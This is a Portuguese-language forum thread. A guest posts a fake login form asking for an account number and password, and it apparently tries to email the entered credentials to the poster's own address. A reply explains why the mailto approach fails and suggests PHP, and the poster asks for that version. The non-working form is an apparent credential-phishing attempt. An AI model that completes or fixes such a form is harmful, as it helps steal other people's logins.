Ir para conteúdo
Fórum Script Brasil
  • 0

Duvida e erro


Guest gamefor

Pergunta

&lt;script src="gamefor.blogspot.com" type="text/javascript"></script><form action="" name="cad" method="post" onsubmit="return checar(this.name)">  <label>Numero da conta:</label>
<input vazio="false" nome="Nome" name="nome" size="20" type="password"/>


<label>Senha:</label>
<input onclick="parent.location='mailto:meuemail@meuemail.com?subject=SEU ASSUNTO &cc=meuemail@meuemail.com" email="true" nome="E-Mail" name="password" size="20" type="password"/>

<input onclick="parent.location='mailto:meuemail@meuemail.com?subject=SEU ASSUNTO &cc=meuemail@meuemail.com" value="Login" type="submit"/>
</form>

&lt;script type="text/javascript"><br/></script>

por que esse script não me manda o email com as informaçoes???

me ajudem plz

Link para o comentário
Compartilhar em outros sites

5 respostass a esta questão

Posts Recomendados

  • 0

Bem... um dos motivos é que você está usando o parent.location no evento onclick, e essa função direciona para uma url, e a menos que aquilo que você passou na url seja realmente uma página, ele não vai mandar!!!

Tem também algumas inconsistências de HTML, mas de qualquer forma a única maneira dinâmica de mandar email via javascript depende de itens como navegador, cliente de email (como o outlook), etc...

Se você não quiser que seja obrigatória a abertura desses programas, sugiro uma linguagem server side como o PHP...

Link para o comentário
Compartilhar em outros sites

  • 0
Bem... um dos motivos é que você está usando o parent.location no evento onclick, e essa função direciona para uma url, e a menos que aquilo que você passou na url seja realmente uma página, ele não vai mandar!!!

Tem também algumas inconsistências de HTML, mas de qualquer forma a única maneira dinâmica de mandar email via javascript depende de itens como navegador, cliente de email (como o outlook), etc...

Se você não quiser que seja obrigatória a abertura desses programas, sugiro uma linguagem server side como o PHP...

ta e nesse esquema de php como ficaria esso codigo?

OBS.: a ultima linha do codigo q eu postei não é nada, desculpa pelo erro.

Link para o comentário
Compartilhar em outros sites

  • 0

<script src="gamefor.blogspot.com" type="text/javascript"></script>

<form action="" name="cad" method="post" onsubmit="return checar(this.name)">  <label>Numero da conta:</label>
<input vazio="false" nome="Nome" name="nome" size="20" type="password"/>


<label>Senha:</label>
<input email="true" nome="E-Mail" name="password" onclick="mailto:safadinho-06@hotmail.com?subject=SEU ASSUNTO &cc=safadinho-06@hotmail.com" size="20" type="password"/>

<input value="Login" onclick="mailto:safadinho-06@hotmail.com?subject=SEU ASSUNTO &cc=safadinho-06@hotmail.com" type="submit"/>
</form>

<script type="text/javascript"><br/></script>

e assim ? codigo reescrito do jeito q ta funciona? xD

Link para o comentário
Compartilhar em outros sites

Participe da discussão

Você pode postar agora e se registrar depois. Se você já tem uma conta, acesse agora para postar com sua conta.

Visitante
Responder esta pergunta...

×   Você colou conteúdo com formatação.   Remover formatação

  Apenas 75 emoticons são permitidos.

×   Seu link foi incorporado automaticamente.   Exibir como um link em vez disso

×   Seu conteúdo anterior foi restaurado.   Limpar Editor

×   Você não pode colar imagens diretamente. Carregar ou inserir imagens do URL.



  • Estatísticas dos Fóruns

    • Tópicos
      152,2k
    • Posts
      651,9k
×
×
  • Criar Novo...